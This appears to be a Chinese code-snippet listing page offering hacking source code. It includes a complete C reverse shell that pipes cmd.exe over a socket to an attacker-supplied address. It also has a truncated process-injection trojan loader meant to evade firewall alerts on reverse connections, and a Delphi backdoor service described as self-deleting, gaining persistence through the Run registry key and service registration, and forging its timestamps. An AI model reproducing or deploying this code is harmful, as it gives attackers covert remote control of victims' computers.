Source Code

释放VC++中资源文件包含的文件

释放VC++中资源文件包含的文件

/************************************************************************/ /* 函数说明:释放资源中某类型的文件 /* 参 数:新文件名、资源ID、资源类型 /* 返 回 值:成功返回TRUE,否则返回FALSE /* By:Koma 2009.07.24 23:30 /************************************************************************/ BOOL CTestDlg::ReleaseRes(CString strFileName,WORD wResID,CString strFileType) {  // 资源大小  DWORD dwWrite=0;   // 创建文件  HANDLE hFile = CreateFile(strFileName, GENERIC_WRITE,FILE_SHARE_WRITE,NULL,  CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);  if ( hFile == INVALID_HANDLE_VALUE )  {  return FALSE;  }   // 查找资源文件中、加载资源到内存、得到资源大小  HRSRC hrsc = FindResource(NULL, MAKEINTRESOURCE(wResID),...

微型反向连接CMD,C语言代码

微型反向连接CMD,C语言代码

#include <winsock2.h> #pragma comment(lib,”ws2_32″) int main(int argc, char **argv) { WSADATA wsaData; SOCKET hSocket; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in adik_sin; memset(&adik_sin,0,sizeof(adik_sin)); memset(&si,0,sizeof(si)); WSAStartup(MAKEWORD(2,0),&wsaData); hSocket=WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL); adik_sin.sin_family=AF_INET; adik_sin.sin_port=htons(atoi(argv[2])); adik_sin.sin_addr.s_addr=inet_addr(argv[1]); if(0!=connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin))) return -1; si.cb=sizeof(si); si.dwFlags=STARTF_USESTDHANDLES; si.hStdInput=si.hStdOutput=si.hStdError=(void *)hSocket; CreateProcess(NULL,”cmd.exe”,NULL,NULL,1,NULL,NULL,NULL,&si,&pi); return 0; }

绕过防火墙的反向连接报警

绕过防火墙的反向连接报警

绕过防火墙的反向连接报警 Author: Polymorphours Email: Polymorphours@whitecell.org Homepage:http://www.whitecell.org Date: 2005-11-17 /* Author: Polymorphours Date: 2005/1/10 另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的 反向连接报警。 */ #include <stdio.h> #include <windows.h> // // ntdll.lib ( 来自DDK 2000 ) // #pragma comment(lib,”ntdll.lib”) typedef long NTSTATUS; NTSYSAPI NTSTATUS NTAPI ZwUnmapViewOfSection( HANDLE ProcessHandle, PVOID BaseAddress ); typedef struct _ChildProcessInfo { DWORD dwBaseAddress; DWORD dwReserve;...

一个简单的反向连接服务程序

一个简单的反向连接服务程序

一个简单的反向连接服务程序 功能简介: 运行后自删除,写注册表Run下,同时自拷贝到系统目录下,注册为系统服务SvrDemo,修改文件时间同Cmd.exe,每隔俩秒钟连接一次本地(127.0.0.1)的600端口,ip地址和端口可自行修改,部分代码来源于网上修改,主要在于演示服务程序,用fsg2.0加壳后9.8k,编译环境D7+2kPro 在命令行下加参数 /U 可以卸载服务程序。 program SvrDemo; uses Windows, WinSvc, winsock; const RegName = ‘SvrDemo’; var szServiceName: pchar = ‘SvrDemo’; szFileName:pchar; ServiceTable: array [0..1] of TServiceTableEntry; Status: SERVICE_STATUS; StatusHandle: SERVICE_STATUS_HANDLE; Stopped: boolean; Paused: boolean; cmd :array[0..MAX_PATH] of char; //获取系统目录 function GetDirectory(dInt: Integer): string; var s: array[0..255] of Char; begin...